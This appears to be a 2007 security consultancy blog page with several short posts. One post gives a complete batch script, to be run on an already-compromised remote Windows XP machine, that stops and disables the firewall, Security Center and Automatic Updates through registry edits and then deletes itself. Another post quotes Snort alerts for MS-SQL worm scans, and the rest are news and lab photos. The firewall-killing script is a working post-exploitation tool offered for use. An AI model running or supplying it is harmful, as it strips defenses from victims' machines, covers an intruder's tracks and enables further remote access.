IRON::Guard Security, LLC is a full-service information security consulting firm. Our Professional Services range from Penetration Testing, Vulnerability Assessments, Audits/Compliance - GRC, Incident Response, Managed Security Services, Physical Threat Assessments, Training Services and DR/Business Continuity Planning.
Friday, November 16, 2007
Argus, Afterflow and NSMWiki
If you're not an ISSA member, you can read Russ' article here.
Friday, November 9, 2007
Post Exploitation Technique: Kill the Windows XP SP2 firewall
This registry hack assumes that you already possess a remote shell and need to kill the firewall remotely (to spawn remote shells on certain egress ports). To use, save the code below into a batch file (ie down.bat) and run on the remote computer.
@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\kill.reg" ECHO REGEDIT4
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0
May Your Skill Prevail.
Thursday, November 8, 2007
When Script Kiddies Attack!
[**] [1:2003:8] MS-SQL Worm propagation attempt [**]
[Classification: Misc Attack] [Priority: 2]
08/14-07:35:43.418518 10.10.10.254:2456 -> 10.1.4.3:1434
UDP TTL:110 TOS:0x20 ID:24321 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content
http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
http://www.securityfocus.com
[**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]
[Classification: Misc Attack] [Priority: 2]
08/14-07:35:43.418518 10.10.10.254:2456 -> 10.1.4.3:1434
UDP TTL:110 TOS:0x20 ID:24321 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content
http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
http://www.securityfocus.com
[**] [1:2050:9] MS-SQL version overflow attempt [**]
[Classification: Misc activity] [Priority: 3]
08/14-07:35:43.418518 10.10.10.254:2456 -> 10.1.4.3:1434
UDP TTL:110 TOS:0x20 ID:24321 IpLen:20 DgmLen:404
Len: 376
[Xref => http://www.microsoft.com
=> http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
[**] [1:2003:8] MS-SQL Worm propagation attempt [**]
[Classification: Misc Attack] [Priority: 2]
08/14-15:28:04.702026 218.232.95.60:3664 -> 10.1.4.3:1434
UDP TTL:108 TOS:0x20 ID:34162 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content
http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
http://www.securityfocus.com
[**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]
[Classification: Misc Attack] [Priority: 2]
08/14-15:28:04.702026 218.232.95.60:3664 -> 10.1.4.3:1434
UDP TTL:108 TOS:0x20 ID:34162 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content
http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
http://www.securityfocus.com
[**] [1:2050:9] MS-SQL version overflow attempt [**]
[Classification: Misc activity] [Priority: 3]
08/14-15:28:04.702026 218.232.95.60:3664 -> 10.1.4.3:1434
UDP TTL:108 TOS:0x20 ID:34162 IpLen:20 DgmLen:404
Len: 376
[Xref => http://www.microsoft.com
=> http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
[**] [1:2003:8] MS-SQL Worm propagation attempt [**]
[Classification: Misc Attack] [Priority: 2]
08/14-15:42:58.867441 202.106.102.195:1071 -> 10.1.4.3:1434
UDP TTL:108 TOS:0x20 ID:24341 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content
http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
http://www.securityfocus.com
[**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]
[Classification: Misc Attack] [Priority: 2]
08/14-15:42:58.867441 202.106.102.195:1071 -> 10.1.4.3:1434
UDP TTL:108 TOS:0x20 ID:24341 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content
http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
http://www.securityfocus.com
[**] [1:2050:9] MS-SQL version overflow attempt [**]
[Classification: Misc activity] [Priority: 3]
08/14-15:42:58.867441 202.106.102.195:1071 -> 10.1.4.3:1434
UDP TTL:108 TOS:0x20 ID:24341 IpLen:20 DgmLen:404
Len: 376
[Xref => http://www.microsoft.com
=> http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
[**] [1:2003:8] MS-SQL Worm propagation attempt [**]
[Classification: Misc Attack] [Priority: 2]
08/14-19:15:19.388509 221.195.73.84:1042 -> 10.1.4.3:1434
UDP TTL:109 TOS:0x20 ID:47455 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content
http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
http://www.securityfocus.com
[**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]
[Classification: Misc Attack] [Priority: 2]
08/14-19:15:19.388509 221.195.73.84:1042 -> 10.1.4.3:1434
UDP TTL:109 TOS:0x20 ID:47455 IpLen:20 DgmLen:404
Len: 376
[Xref => http://vil.nai.com/vil/content
http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
http://www.securityfocus.com
[**] [1:2050:9] MS-SQL version overflow attempt [**]
[Classification: Misc activity] [Priority: 3]
08/14-19:15:19.388509 221.195.73.84:1042 -> 10.1.4.3:1434
UDP TTL:109 TOS:0x20 ID:47455 IpLen:20 DgmLen:404
Len: 376
[Xref => http://www.microsoft.com
=> http://cgi.nessus.org/plugins
http://cve.mitre.org/cgi-bin
http://www.securityfocus.com
Wednesday, November 7, 2007
BlackHat Vegas 2007 and Defcon 15 Photos
View the photos here.
Home/Office Lab
From rats nest to organization. The majority of equipment was moved off desks and tables onto a rack along with the introduction of actual cable and wiring management. Additional power was also added to deal with random (and frustrating) power losses.
View the transformation.